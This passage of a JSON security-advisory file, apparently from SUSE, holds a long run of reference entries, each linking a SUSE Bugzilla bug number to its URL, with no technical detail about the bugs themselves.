"summary": "SUSE Bug 1255077",
"url": "https://bugzilla.suse.com/1255077"
},
{
"category": "self",
"summary": "SUSE Bug 1255081",
"url": "https://bugzilla.suse.com/1255081"
},
{
"category": "self",
"summary": "SUSE Bug 1255082",
"url": "https://bugzilla.suse.com/1255082"
},
{
"category": "self",
"summary": "SUSE Bug 1255083",
"url": "https://bugzilla.suse.com/1255083"
},
{
"category": "self",
"summary": "SUSE Bug 1255092",
"url": "https://bugzilla.suse.com/1255092"
},
{
"category": "self",
"summary": "SUSE Bug 1255094",
"url": "https://bugzilla.suse.com/1255094"
},
{
"category": "self",
"summary": "SUSE Bug 1255095",
"url": "https://bugzilla.suse.com/1255095"
},
{
"category": "self",
"summary": "SUSE Bug 1255100",
"url": "https://bugzilla.suse.com/1255100"
},
{
"category": "self",
"summary": "SUSE Bug 1255102",
"url": "https://bugzilla.suse.com/1255102"
},
{
"category": "self",
"summary": "SUSE Bug 1255120",
"url": "https://bugzilla.suse.com/1255120"
},
{
"category": "self",
"summary": "SUSE Bug 1255122",
"url": "https://bugzilla.suse.com/1255122"
},
{
"category": "self",
"summary": "SUSE Bug 1255128",
"url": "https://bugzilla.suse.com/1255128"
},
{
"category": "self",
"summary": "SUSE Bug 1255131",
"url": "https://bugzilla.suse.com/1255131"
},
{
"category": "self",
"summary": "SUSE Bug 1255134",
"url": "https://bugzilla.suse.com/1255134"
},
{
"category": "self",
"summary": "SUSE Bug 1255135",
"url": "https://bugzilla.suse.com/1255135"
},
{
"category": "self",
"summary": "SUSE Bug 1255136",
"url": "https://bugzilla.suse.com/1255136"
},
{
"category": "self",
"summary": "SUSE Bug 1255138",
"url": "https://bugzilla.suse.com/1255138"
},
{
"category": "self",
"summary": "SUSE Bug 1255140",
"url": "https://bugzilla.suse.com/1255140"
},
{
"category": "self",
"summary": "SUSE Bug 1255142",
"url": "https://bugzilla.suse.com/1255142"
},
{
"category": "self",
"summary": "SUSE Bug 1255146",
"url": "https://bugzilla.suse.com/1255146"
},
{
"category": "self",
"summary": "SUSE Bug 1255149",
"url": "https://bugzilla.suse.com/1255149"
},
{
"category": "self",
"summary": "SUSE Bug 1255152",
"url": "https://bugzilla.suse.com/1255152"
},
{
"category": "self",
"summary": "SUSE Bug 1255154",
"url": "https://bugzilla.suse.com/1255154"
},
{
"category": "self",
"summary": "SUSE Bug 1255155",
"url": "https://bugzilla.suse.com/1255155"
},
{
"category": "self",
"summary": "SUSE Bug 1255157",
"url": "https://bugzilla.suse.com/1255157"
},
{
"category": "self",
"summary": "SUSE Bug 1255163",
"url": "https://bugzilla.suse.com/1255163"
},
{
"category": "self",
"summary": "SUSE Bug 1255164",
"url": "https://bugzilla.suse.com/1255164"
},
{
"category": "self",
"summary": "SUSE Bug 1255167",
"url": "https://bugzilla.suse.com/1255167"
},
{
"category": "self",
"summary": "SUSE Bug 1255169",
"url": "https://bugzilla.suse.com/1255169"
},
{
"category": "self",
"summary": "SUSE Bug 1255171",
"url": "https://bugzilla.suse.com/1255171"
},
{
"category": "self",
"summary": "SUSE Bug 1255172",
"url": "https://bugzilla.suse.com/1255172"
},
{
"category": "self",
"summary": "SUSE Bug 1255175",
"url": "https://bugzilla.suse.com/1255175"
},
{
"category": "self",
"summary": "SUSE Bug 1255179",
"url": "https://bugzilla.suse.com/1255179"
},
{
"category": "self",
"summary": "SUSE Bug 1255182",
"url": "https://bugzilla.suse.com/1255182"
},
{
"category": "self",
"summary": "SUSE Bug 1255187",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "self",
"summary": "SUSE Bug 1255190",
"url": "https://bugzilla.suse.com/1255190"
},
{
"category": "self",
"summary": "SUSE Bug 1255193",
"url": "https://bugzilla.suse.com/1255193"
},
{
"category": "self",
"summary": "SUSE Bug 1255197",
"url": "https://bugzilla.suse.com/1255197"
},
{
"category": "self",
"summary": "SUSE Bug 1255199",
"url": "https://bugzilla.suse.com/1255199"
},
{
"category": "self",
"summary": "SUSE Bug 1255202",
"url": "https://bugzilla.suse.com/1255202"
},
{
"category": "self",
"summary": "SUSE Bug 1255203",
"url": "https://bugzilla.suse.com/1255203"
},
{
"category": "self",
"summary": "SUSE Bug 1255206",
"url": "https://bugzilla.suse.com/1255206"
},
{
"category": "self",
"summary": "SUSE Bug 1255209",
"url": "https://bugzilla.suse.com/1255209"
},
{
"category": "self",
"summary": "SUSE Bug 1255216",
"url": "https://bugzilla.suse.com/1255216"
},
{
"category": "self",
"summary": "SUSE Bug 1255218",
"url": "https://bugzilla.suse.com/1255218"
},
{
"category": "self",
"summary": "SUSE Bug 1255221",
"url": "https://bugzilla.suse.com/1255221"
},
{
"category": "self",
"summary": "SUSE Bug 1255224",
"url": "https://bugzilla.suse.com/1255224"
},
{
"category": "self",
"summary": "SUSE Bug 1255227",
"url": "https://bugzilla.suse.com/1255227"
},
{
"category": "self",
"summary": "SUSE Bug 1255230",
"url": "https://bugzilla.suse.com/1255230"
},
{
"category": "self",
"summary": "SUSE Bug 1255233",
"url": "https://bugzilla.suse.com/1255233"
},
{
"category": "self",
"summary": "SUSE Bug 1255241",
"url": "https://bugzilla.suse.com/1255241"
},
{
"category": "self",
"summary": "SUSE Bug 1255245",
"url": "https://bugzilla.suse.com/1255245"
},
{
"category": "self",
"summary": "SUSE Bug 1255246",
"url": "https://bugzilla.suse.com/1255246"
},
{
"category": "self",
"summary": "SUSE Bug 1255251",
"url": "https://bugzilla.suse.com/1255251"
},
{
"category": "self",
"summary": "SUSE Bug 1255252",
"url": "https://bugzilla.suse.com/1255252"
},
{
"category": "self",
"summary": "SUSE Bug 1255253",
"url": "https://bugzilla.suse.com/1255253"
},
{
"category": "self",
"summary": "SUSE Bug 1255255",
"url": "https://bugzilla.suse.com/1255255"
},
{
"category": "self",
"summary": "SUSE Bug 1255259",
"url": "https://bugzilla.suse.com/1255259"
},
{
"category": "self",
"summary": "SUSE Bug 1255260",
"url": "https://bugzilla.suse.com/1255260"
},
{
"category": "self",
"summary": "SUSE Bug 1255261",
"url": "https://bugzilla.suse.com/1255261"
},
{
"category": "self",
"summary": "SUSE Bug 1255262",
"url": "https://bugzilla.suse.com/1255262"
},
{
"category": "self",
"summary": "SUSE Bug 1255266",
"url": "https://bugzilla.suse.com/1255266"
},
{
"category": "self",
"summary": "SUSE Bug 1255268",
"url": "https://bugzilla.suse.com/1255268"
},
{
"category": "self",
"summary": "SUSE Bug 1255269",
"url": "https://bugzilla.suse.com/1255269"
},
{
"category": "self",
"summary": "SUSE Bug 1255272",
"url": "https://bugzilla.suse.com/1255272"
},
{
"category": "self",
"summary": "SUSE Bug 1255273",
"url": "https://bugzilla.suse.com/1255273"
},
{
"category": "self",
"summary": "SUSE Bug 1255274",
"url": "https://bugzilla.suse.com/1255274"
},
{
"category": "self",
"summary": "SUSE Bug 1255276",
"url": "https://bugzilla.suse.com/1255276"
},
{
"category": "self",
"summary": "SUSE Bug 1255279",
"url": "https://bugzilla.suse.com/1255279"
},
{
"category": "self",
"summary": "SUSE Bug 1255280",
"url": "https://bugzilla.suse.com/1255280"
},
{
"category": "self",
"summary": "SUSE Bug 1255281",
"url": "https://bugzilla.suse.com/1255281"
},
{
"category": "self",
"summary": "SUSE Bug 1255297",
"url": "https://bugzilla.suse.com/1255297"
},
{
"category": "self",
"summary": "SUSE Bug 1255318",
"url": "https://bugzilla.suse.com/1255318"
},
{
"category": "self",
"summary": "SUSE Bug 1255325",
"url": "https://bugzilla.suse.com/1255325"
},
{
"category": "self",
"summary": "SUSE Bug 1255327",
"url": "https://bugzilla.suse.com/1255327"
},
{
"category": "self",
"summary": "SUSE Bug 1255329",
"url": "https://bugzilla.suse.com/1255329"
},
{
"category": "self",
"summary": "SUSE Bug 1255351",
"url": "https://bugzilla.suse.com/1255351"
},
{
"category": "self",
"summary": "SUSE Bug 1255377",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "self",
"summary": "SUSE Bug 1255380",
"url": "https://bugzilla.suse.com/1255380"
},
{
"category": "self",
"summary": "SUSE Bug 1255395",
"url": "https://bugzilla.suse.com/1255395"
},
{
"category": "self",
"summary": "SUSE Bug 1255401",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "self",
"summary": "SUSE Bug 1255403",
"url": "https://bugzilla.suse.com/1255403"
},
{
"category": "self",
"summary": "SUSE Bug 1255415",
"url": "https://bugzilla.suse.com/1255415"
},
{
"category": "self",
"summary": "SUSE Bug 1255417",
"url": "https://bugzilla.suse.com/1255417"
},
{
"category": "self",
"summary": "SUSE Bug 1255428",
"url": "https://bugzilla.suse.com/1255428"
},
{
"category": "self",
"summary": "SUSE Bug 1255480",
"url": "https://bugzilla.suse.com/1255480"
},
{
"category": "self",
"summary": "SUSE Bug 1255482",
"url": "https://bugzilla.suse.com/1255482"
},
{
"category": "self",
"summary": "SUSE Bug 1255483",
"url": "https://bugzilla.suse.com/1255483"
},
{
"category": "self",
"summary": "SUSE Bug 1255488",
"url": "https://bugzilla.suse.com/1255488"
},
{
"category": "self",
"summary": "SUSE Bug 1255489",
"url": "https://bugzilla.suse.com/1255489"
},
{
"category": "self",
"summary": "SUSE Bug 1255493",
"url": "https://bugzilla.suse.com/1255493"
},
{
"category": "self",
"summary": "SUSE Bug 1255495",
"url": "https://bugzilla.suse.com/1255495"
},
{
"category": "self",
"summary": "SUSE Bug 1255505",
"url": "https://bugzilla.suse.com/1255505"
},
{
"category": "self",
"summary": "SUSE Bug 1255507",
"url": "https://bugzilla.suse.com/1255507"
},
{
"category": "self",
"summary": "SUSE Bug 1255537",
"url": "https://bugzilla.suse.com/1255537"
},
{
"category": "self",
"summary": "SUSE Bug 1255538",
"url": "https://bugzilla.suse.com/1255538"
},
{
"category": "self",
"summary": "SUSE Bug 1255539",
"url": "https://bugzilla.suse.com/1255539"
},
{
"category": "self",
"summary": "SUSE Bug 1255540",
"url": "https://bugzilla.suse.com/1255540"
},
{
"category": "self",
"summary": "SUSE Bug 1255544",
"url": "https://bugzilla.suse.com/1255544"
},
{
"category": "self",
"summary": "SUSE Bug 1255545",
"url": "https://bugzilla.suse.com/1255545"
},
{
"category": "self",
"summary": "SUSE Bug 1255547",
"url": "https://bugzilla.suse.com/1255547"
},
{
"category": "self",
"summary": "SUSE Bug 1255548",
"url": "https://bugzilla.suse.com/1255548"
},
{
"category": "self",
"summary": "SUSE Bug 1255549",
"url": "https://bugzilla.suse.com/1255549"
},
{
"category": "self",
"summary": "SUSE Bug 1255550",
"url": "https://bugzilla.suse.com/1255550"
},
{
"category": "self",
"summary": "SUSE Bug 1255552",
"url": "https://bugzilla.suse.com/1255552"
},
{
"category": "self",
"summary": "SUSE Bug 1255553",
"url": "https://bugzilla.suse.com/1255553"
},
{
"category": "self",
"summary": "SUSE Bug 1255557",
"url": "https://bugzilla.suse.com/1255557"
},
{
"category": "self",
"summary": "SUSE Bug 1255558",
"url": "https://bugzilla.suse.com/1255558"
},
{
"category": "self",
"summary": "SUSE Bug 1255563",
"url": "https://bugzilla.suse.com/1255563"
},
{
"category": "self",
"summary": "SUSE Bug 1255564",
"url": "https://bugzilla.suse.com/1255564"
},
{
"category": "self",
"summary": "SUSE Bug 1255567",
"url": "https://bugzilla.suse.com/1255567"
},
{
"category": "self",
"summary": "SUSE Bug 1255568",
"url": "https://bugzilla.suse.com/1255568"
},
{
"category": "self",
"summary": "SUSE Bug 1255569",
"url": "https://bugzilla.suse.com/1255569"
},
{
"category": "self",
"summary": "SUSE Bug 1255570",
"url": "https://bugzilla.suse.com/1255570"
},
{
"category": "self",
"summary": "SUSE Bug 1255578",
"url": "https://bugzilla.suse.com/1255578"
},
{
"category": "self",
"summary": "SUSE Bug 1255579",
"url": "https://bugzilla.suse.com/1255579"
},
{
"category": "self",
"summary": "SUSE Bug 1255580",
"url": "https://bugzilla.suse.com/1255580"
},
{
"category": "self",
"summary": "SUSE Bug 1255583",
"url": "https://bugzilla.suse.com/1255583"
},
{
"category": "self",
"summary": "SUSE Bug 1255591",
"url": "https://bugzilla.suse.com/1255591"
},
{
"category": "self",
"summary": "SUSE Bug 1255601",
"url": "https://bugzilla.suse.com/1255601"
},
{
"category": "self",
"summary": "SUSE Bug 1255603",
"url": "https://bugzilla.suse.com/1255603"
},
{
"category": "self",
"summary": "SUSE Bug 1255605",
"url": "https://bugzilla.suse.com/1255605"
},
{
"category": "self",
"summary": "SUSE Bug 1255611",
"url": "https://bugzilla.suse.com/1255611"
},
{
"category": "self",
"summary": "SUSE Bug 1255614",
"url": "https://bugzilla.suse.com/1255614"
},
{
"category": "self",
"summary": "SUSE Bug 1255615",
"url": "https://bugzilla.suse.com/1255615"
},
{
"category": "self",
"summary": "SUSE Bug 1255616",
"url": "https://bugzilla.suse.com/1255616"
},
{
"category": "self",
"summary": "SUSE Bug 1255617",
"url": "https://bugzilla.suse.com/1255617"
},
{
"category": "self",
"summary": "SUSE Bug 1255618",
"url": "https://bugzilla.suse.com/1255618"
},
{
"category": "self",
"summary": "SUSE Bug 1255621",
"url": "https://bugzilla.suse.com/1255621"
},
{
"category": "self",
"summary": "SUSE Bug 1255622",
"url": "https://bugzilla.suse.com/1255622"
},
{
"category": "self",
"summary": "SUSE Bug 1255628",
"url": "https://bugzilla.suse.com/1255628"
},
{
"category": "self",
"summary": "SUSE Bug 1255629",
"url": "https://bugzilla.suse.com/1255629"
},
{
"category": "self",
"summary": "SUSE Bug 1255630",
"url": "https://bugzilla.suse.com/1255630"
},
{
"category": "self",
"summary": "SUSE Bug 1255632",
"url": "https://bugzilla.suse.com/1255632"
},
{
"category": "self",
"summary": "SUSE Bug 1255636",
"url": "https://bugzilla.suse.com/1255636"
},
{
"category": "self",
"summary": "SUSE Bug 1255688",
"url": "https://bugzilla.suse.com/1255688"
},
{
"category": "self",
"summary": "SUSE Bug 1255691",
"url": "https://bugzilla.suse.com/1255691"
},
{
"category": "self",
"summary": "SUSE Bug 1255695",
"url": "https://bugzilla.suse.com/1255695"
},
{
"category": "self",
"summary": "SUSE Bug 1255702",
"url": "https://bugzilla.suse.com/1255702"
},
{
"category": "self",
"summary": "SUSE Bug 1255704",
"url": "https://bugzilla.suse.com/1255704"
},
{
"category": "self",
"summary": "SUSE Bug 1255706",
"url": "https://bugzilla.suse.com/1255706"
},
{
"category": "self",
"summary": "SUSE Bug 1255707",
"url": "https://bugzilla.suse.com/1255707"
},
{
"category": "self",
"summary": "SUSE Bug 1255709",
"url": "https://bugzilla.suse.com/1255709"
},
{
"category": "self",
"summary": "SUSE Bug 1255722",
"url": "https://bugzilla.suse.com/1255722"
},
{
"category": "self",
"summary": "SUSE Bug 1255758",
"url": "https://bugzilla.suse.com/1255758"
},
{
"category": "self",
"summary": "SUSE Bug 1255759",
"url": "https://bugzilla.suse.com/1255759"
},
{
"category": "self",
"summary": "SUSE Bug 1255760",
"url": "https://bugzilla.suse.com/1255760"
},
{
"category": "self",
"summary": "SUSE Bug 1255763",
"url": "https://bugzilla.suse.com/1255763"
},
{
"category": "self",
"summary": "SUSE Bug 1255769",
"url": "https://bugzilla.suse.com/1255769"
},
{
"category": "self",
"summary": "SUSE Bug 1255770",
"url": "https://bugzilla.suse.com/1255770"
},
{
"category": "self",
"summary": "SUSE Bug 1255772",
"url": "https://bugzilla.suse.com/1255772"
},
{
"category": "self",
"summary": "SUSE Bug 1255774",
"url": "https://bugzilla.suse.com/1255774"
},
{
"category": "self",
"summary": "SUSE Bug 1255775",
"url": "https://bugzilla.suse.com/1255775"
},
{
"category": "self",
"summary": "SUSE Bug 1255776",
"url": "https://bugzilla.suse.com/1255776"
},
{
"category": "self",
"summary": "SUSE Bug 1255780",
"url": "https://bugzilla.suse.com/1255780"
},
{
"category": "self",
"summary": "SUSE Bug 1255785",
"url": "https://bugzilla.suse.com/1255785"
},
{
"category": "self",
"summary": "SUSE Bug 1255786",
"url": "https://bugzilla.suse.com/1255786"
},
{
"category": "self",
"summary": "SUSE Bug 1255789",
"url": "https://bugzilla.suse.com/1255789"
},
{
"category": "self",
"summary": "SUSE Bug 1255790",
"url": "https://bugzilla.suse.com/1255790"
},
{
"category": "self",
"summary": "SUSE Bug 1255792",
"url": "https://bugzilla.suse.com/1255792"
},
{
"category": "self",
"summary": "SUSE Bug 1255793",
"url": "https://bugzilla.suse.com/1255793"
},
{
"category": "self",
"summary": "SUSE Bug 1255795",
"url": "https://bugzilla.suse.com/1255795"
},
{
"category": "self",
"summary": "SUSE Bug 1255798",
"url": "https://bugzilla.suse.com/1255798"
},
{
"category": "self",
"summary": "SUSE Bug 1255800",
"url": "https://bugzilla.suse.com/1255800"
},
{
"category": "self",
"summary": "SUSE Bug 1255801",
"url": "https://bugzilla.suse.com/1255801"
},
{
"category": "self",
"summary": "SUSE Bug 1255806",
"url": "https://bugzilla.suse.com/1255806"
},
{
"category": "self",
"summary": "SUSE Bug 1255807",
"url": "https://bugzilla.suse.com/1255807"
},
{
"category": "self",
"summary": "SUSE Bug 1255809",
"url": "https://bugzilla.suse.com/1255809"
},
{
"category": "self",
"summary": "SUSE Bug 1255810",
"url": "https://bugzilla.suse.com/1255810"
},
{
"category": "self",
"summary": "SUSE Bug 1255812",
"url": "https://bugzilla.suse.com/1255812"
},
{
"category": "self",
"summary": "SUSE Bug 1255814",
"url": "https://bugzilla.suse.com/1255814"
},
{
"category": "self",
"summary": "SUSE Bug 1255820",
"url": "https://bugzilla.suse.com/1255820"
},
{
"category": "self",
"summary": "SUSE Bug 1255838",
"url": "https://bugzilla.suse.com/1255838"
},
{
"category": "self",
"summary": "SUSE Bug 1255842",
"url": "https://bugzilla.suse.com/1255842"
},
{
"category": "self",
"summary": "SUSE Bug 1255843",
"url": "https://bugzilla.suse.com/1255843"
},
{
"category": "self",
"summary": "SUSE Bug 1255872",
"url": "https://bugzilla.suse.com/1255872"
},
{
"category": "self",
"summary": "SUSE Bug 1255875",
"url": "https://bugzilla.suse.com/1255875"
},
{
"category": "self",
"summary": "SUSE Bug 1255879",
"url": "https://bugzilla.suse.com/1255879"
},
{
"category": "self",
"summary": "SUSE Bug 1255883",
"url": "https://bugzilla.suse.com/1255883"
},
{
"category": "self",
"summary": "SUSE Bug 1255884",
"url": "https://bugzilla.suse.com/1255884"
},
{
"category": "self",
"summary": "SUSE Bug 1255886",
"url": "https://bugzilla.suse.com/1255886"
},
{
"category": "self",
"summary": "SUSE Bug 1255888",
"url": "https://bugzilla.suse.com/1255888"
},
{
"category": "self",
"summary": "SUSE Bug 1255890",
"url": "https://bugzilla.suse.com/1255890"
},
{
"category": "self",
"summary": "SUSE Bug 1255891",
"url": "https://bugzilla.suse.com/1255891"
},
{
"category": "self",
"summary": "SUSE Bug 1255892",
"url": "https://bugzilla.suse.com/1255892"
},
{
"category": "self",
"summary": "SUSE Bug 1255899",
"url": "https://bugzilla.suse.com/1255899"
},
{
"category": "self",
"summary": "SUSE Bug 1255902",
"url": "https://bugzilla.suse.com/1255902"
},
{
"category": "self",
"summary": "SUSE Bug 1255907",
"url": "https://bugzilla.suse.com/1255907"
},
{
"category": "self",
"summary": "SUSE Bug 1255911",
"url": "https://bugzilla.suse.com/1255911"
},
{
"category": "self",
"summary": "SUSE Bug 1255915",
"url": "https://bugzilla.suse.com/1255915"
},
{
"category": "self",
"summary": "SUSE Bug 1255918",
"url": "https://bugzilla.suse.com/1255918"
},
{
"category": "self",
"summary": "SUSE Bug 1255921",
"url": "https://bugzilla.suse.com/1255921"
},
{
"category": "self",
"summary": "SUSE Bug 1255924",
"url": "https://bugzilla.suse.com/1255924"
},
{
"category": "self",
"summary": "SUSE Bug 1255925",
"url": "https://bugzilla.suse.com/1255925"
},
{
"category": "self",
"summary": "SUSE Bug 1255930",
"url": "https://bugzilla.suse.com/1255930"
},
{
"category": "self",
"summary": "SUSE Bug 1255931",
"url": "https://bugzilla.suse.com/1255931"
},
{
"category": "self",
"summary": "SUSE Bug 1255932",
"url": "https://bugzilla.suse.com/1255932"
},
{
"category": "self",
"summary": "SUSE Bug 1255934",
"url": "https://bugzilla.suse.com/1255934"
},
{
"category": "self",
"summary": "SUSE Bug 1255943",
"url": "https://bugzilla.suse.com/1255943"
},
{
"category": "self",
"summary": "SUSE Bug 1255944",
"url": "https://bugzilla.suse.com/1255944"
},
{
"category": "self",
"summary": "SUSE Bug 1255949",
"url": "https://bugzilla.suse.com/1255949"
},
{
"category": "self",
"summary": "SUSE Bug 1255951",
"url": "https://bugzilla.suse.com/1255951"
},
{
"category": "self",
"summary": "SUSE Bug 1255952",
"url": "https://bugzilla.suse.com/1255952"
},
{
"category": "self",
"summary": "SUSE Bug 1255955",
"url": "https://bugzilla.suse.com/1255955"
},
{
"category": "self",
"summary": "SUSE Bug 1255957",
"url": "https://bugzilla.suse.com/1255957"
},
{
"category": "self",
"summary": "SUSE Bug 1255961",
"url": "https://bugzilla.suse.com/1255961"
},
{
"category": "self",
"summary": "SUSE Bug 1255963",
"url": "https://bugzilla.suse.com/1255963"
},
{
"category": "self",
"summary": "SUSE Bug 1255964",
"url": "https://bugzilla.suse.com/1255964"
},
{
"category": "self",
"summary": "SUSE Bug 1255967",
"url": "https://bugzilla.suse.com/1255967"
},
{
"category": "self",
"summary": "SUSE Bug 1255974",
"url": "https://bugzilla.suse.com/1255974"
},
{
"category": "self",
"summary": "SUSE Bug 1255978",
"url": "https://bugzilla.suse.com/1255978"
},
{
"category": "self",
"summary": "SUSE Bug 1255984",
"url": "https://bugzilla.suse.com/1255984"
},
{
"category": "self",
"summary": "SUSE Bug 1255988",
"url": "https://bugzilla.suse.com/1255988"
},
{
"category": "self",
"summary": "SUSE Bug 1255990",
"url": "https://bugzilla.suse.com/1255990"
},
{
"category": "self",
"summary": "SUSE Bug 1255992",
"url": "https://bugzilla.suse.com/1255992"
},
{
"category": "self",
"summary": "SUSE Bug 1255993",
"url": "https://bugzilla.suse.com/1255993"
},
{
"category": "self",
"summary": "SUSE Bug 1255994",
"url": "https://bugzilla.suse.com/1255994"
},
{
"category": "self",
"summary": "SUSE Bug 1255996",
"url": "https://bugzilla.suse.com/1255996"
},
{
"category": "self",
"summary": "SUSE Bug 1256033",
"url": "https://bugzilla.suse.com/1256033"
},
{
"category": "self",
"summary": "SUSE Bug 1256034",
"url": "https://bugzilla.suse.com/1256034"
},
{
"category": "self",
"summary": "SUSE Bug 1256045",
"url": "https://bugzilla.suse.com/1256045"
},
{
"category": "self",
"summary": "SUSE Bug 1256050",
"url": "https://bugzilla.suse.com/1256050"
},
{
"category": "self",
"summary": "SUSE Bug 1256058",
"url": "https://bugzilla.suse.com/1256058"
},
{
"category": "self",
"summary": "SUSE Bug 1256071",
"url": "https://bugzilla.suse.com/1256071"
},
{
"category": "self",
"summary": "SUSE Bug 1256074",
"url": "https://bugzilla.suse.com/1256074"
},
{
"category": "self",
"summary": "SUSE Bug 1256081",
"url": "https://bugzilla.suse.com/1256081"
},
{
"category": "self",
"summary": "SUSE Bug 1256082",
"url": "https://bugzilla.suse.com/1256082"
},
{
"category": "self",
"summary": "SUSE Bug 1256083",
"url": "https://bugzilla.suse.com/1256083"
},
{
"category": "self",
"summary": "SUSE Bug 1256084",
"url": "https://bugzilla.suse.com/1256084"
},
{
"category": "self",
"summary": "SUSE Bug 1256085",
"url": "https://bugzilla.suse.com/1256085"
},
{
"category": "self",
"summary": "SUSE Bug 1256090",
"url": "https://bugzilla.suse.com/1256090"
},
{
"category": "self",
"summary": "SUSE Bug 1256093",
"url": "https://bugzilla.suse.com/1256093"
},
{
"category": "self",
"summary": "SUSE Bug 1256094",
"url": "https://bugzilla.suse.com/1256094"
},
{
"category": "self",
"summary": "SUSE Bug 1256095",
"url": "https://bugzilla.suse.com/1256095"
},
{
"category": "self",
"summary": "SUSE Bug 1256096",
"url": "https://bugzilla.suse.com/1256096"
},
{
"category": "self",
"summary": "SUSE Bug 1256099",
"url": "https://bugzilla.suse.com/1256099"
},
{
"category": "self",
"summary": "SUSE Bug 1256100",
"url": "https://bugzilla.suse.com/1256100"
},
{
"category": "self",
"summary": "SUSE Bug 1256104",
"url": "https://bugzilla.suse.com/1256104"
},
{
"category": "self",
"summary": "SUSE Bug 1256106",
"url": "https://bugzilla.suse.com/1256106"
},
{
"category": "self",
"summary": "SUSE Bug 1256107",
"url": "https://bugzilla.suse.com/1256107"
},
{
"category": "self",
"summary": "SUSE Bug 1256117",
"url": "https://bugzilla.suse.com/1256117"
},
{
"category": "self",
"summary": "SUSE Bug 1256119",
"url": "https://bugzilla.suse.com/1256119"
},
{
"category": "self",
"summary": "SUSE Bug 1256121",
"url": "https://bugzilla.suse.com/1256121"
},
{
"category": "self",
"summary": "SUSE Bug 1256145",
"url": "https://bugzilla.suse.com/1256145"
},
{
"category": "self",
"summary": "SUSE Bug 1256153",
"url": "https://bugzilla.suse.com/1256153"
},
{
"category": "self",
"summary": "SUSE Bug 1256178",
"url": "https://bugzilla.suse.com/1256178"
},
{
"category": "self",
"summary": "SUSE Bug 1256197",
"url": "https://bugzilla.suse.com/1256197"
},
{
"category": "self",
"summary": "SUSE Bug 1256231",
"url": "https://bugzilla.suse.com/1256231"
},
{
"category": "self",
"summary": "SUSE Bug 1256233",
"url": "https://bugzilla.suse.com/1256233"
},
{
"category": "self",
"summary": "SUSE Bug 1256234",
"url": "https://bugzilla.suse.com/1256234"
},
{
"category": "self",
"summary": "SUSE Bug 1256238",
"url": "https://bugzilla.suse.com/1256238"
},
{
"category": "self",
"summary": "SUSE Bug 1256263",
"url": "https://bugzilla.suse.com/1256263"
},
{
"category": "self",
"summary": "SUSE Bug 1256267",
"url": "https://bugzilla.suse.com/1256267"
},
{
"category": "self",
"summary": "SUSE Bug 1256268",
"url": "https://bugzilla.suse.com/1256268"
},
{
"category": "self",
"summary": "SUSE Bug 1256271",
"url": "https://bugzilla.suse.com/1256271"
},
{
"category": "self",
"summary": "SUSE Bug 1256273",
"url": "https://bugzilla.suse.com/1256273"
},
{
"category": "self",
"summary": "SUSE Bug 1256274",
"url": "https://bugzilla.suse.com/1256274"
},
{
"category": "self",
"summary": "SUSE Bug 1256279",
"url": "https://bugzilla.suse.com/1256279"
},
{
"category": "self",
"summary": "SUSE Bug 1256280",
"url": "https://bugzilla.suse.com/1256280"
},
{
"category": "self",
"summary": "SUSE Bug 1256285",
"url": "https://bugzilla.suse.com/1256285"
},
{
"category": "self",
"summary": "SUSE Bug 1256291",
"url": "https://bugzilla.suse.com/1256291"
},
{
"category": "self",
"summary": "SUSE Bug 1256292",
"url": "https://bugzilla.suse.com/1256292"
},
{
"category": "self",
"summary": "SUSE Bug 1256300",
"url": "https://bugzilla.suse.com/1256300"
},
{
"category": "self",
"summary": "SUSE Bug 1256301",
"url": "https://bugzilla.suse.com/1256301"
},
{
"category": "self",
"summary": "SUSE Bug 1256302",
"url": "https://bugzilla.suse.com/1256302"
},
{
"category": "self",
"summary": "SUSE Bug 1256335",
"url": "https://bugzilla.suse.com/1256335"
},
{
"category": "self",
"summary": "SUSE Bug 1256348",
"url": "https://bugzilla.suse.com/1256348"
},
{
"category": "self",
"summary": "SUSE Bug 1256351",
"url": "https://bugzilla.suse.com/1256351"
},
{
"category": "self",
"summary": "SUSE Bug 1256354",
"url": "https://bugzilla.suse.com/1256354"
},
{
"category": "self",
"summary": "SUSE Bug 1256358",
"url": "https://bugzilla.suse.com/1256358"
},
{
"category": "self",
"summary": "SUSE Bug 1256361",
"url": "https://bugzilla.suse.com/1256361"
},
{
"category": "self",
"summary": "SUSE Bug 1256364",
"url": "https://bugzilla.suse.com/1256364"
},
{
"category": "self",
"summary": "SUSE Bug 1256366",
"url": "https://bugzilla.suse.com/1256366"
},
{
"category": "self",
"summary": "SUSE Bug 1256367",
"url": "https://bugzilla.suse.com/1256367"
},
{
"category": "self",
"summary": "SUSE Bug 1256368",
"url": "https://bugzilla.suse.com/1256368"
},
{
"category": "self",
"summary": "SUSE Bug 1256369",
"url": "https://bugzilla.suse.com/1256369"
},
{
"category": "self",
"summary": "SUSE Bug 1256370",
"url": "https://bugzilla.suse.com/1256370"
},
{
"category": "self",
"summary": "SUSE Bug 1256371",
"url": "https://bugzilla.suse.com/1256371"
},
{
"category": "self",
"summary": "SUSE Bug 1256373",
"url": "https://bugzilla.suse.com/1256373"
},
{
"category": "self",
"summary": "SUSE Bug 1256375",
"url": "https://bugzilla.suse.com/1256375"
},
{
"category": "self",
"summary": "SUSE Bug 1256379",
"url": "https://bugzilla.suse.com/1256379"
},
{
"category": "self",
"summary": "SUSE Bug 1256387",
"url": "https://bugzilla.suse.com/1256387"
},
{
"category": "self",
"summary": "SUSE Bug 1256394",
"url": "https://bugzilla.suse.com/1256394"
},
{
"category": "self",
"summary": "SUSE Bug 1256395",
"url": "https://bugzilla.suse.com/1256395"
},
{
"category": "self",
"summary": "SUSE Bug 1256396",
"url": "https://bugzilla.suse.com/1256396"
},
{
"category": "self",
"summary": "SUSE Bug 1256528",
"url": "https://bugzilla.suse.com/1256528"
},
{
"category": "self",
"summary": "SUSE Bug 1256579",
"url": "https://bugzilla.suse.com/1256579"
},
{
"category": "self",
"summary": "SUSE Bug 1256582",
"url": "https://bugzilla.suse.com/1256582"
},
{
"category": "self",
"summary": "SUSE Bug 1256584",
"url": "https://bugzilla.suse.com/1256584"
},
{
"category": "self",
"summary": "SUSE Bug 1256586",
"url": "https://bugzilla.suse.com/1256586"
},
{
"category": "self",
"summary": "SUSE Bug 1256591",
"url": "https://bugzilla.suse.com/1256591"
},
{
"category": "self",
"summary": "SUSE Bug 1256593",
"url": "https://bugzilla.suse.com/1256593"
},
{
"category": "self",
"summary": "SUSE Bug 1256597",
"url": "https://bugzilla.suse.com/1256597"
},
{
"category": "self",
"summary": "SUSE Bug 1256605",
"url": "https://bugzilla.suse.com/1256605"
},
{
"category": "self",
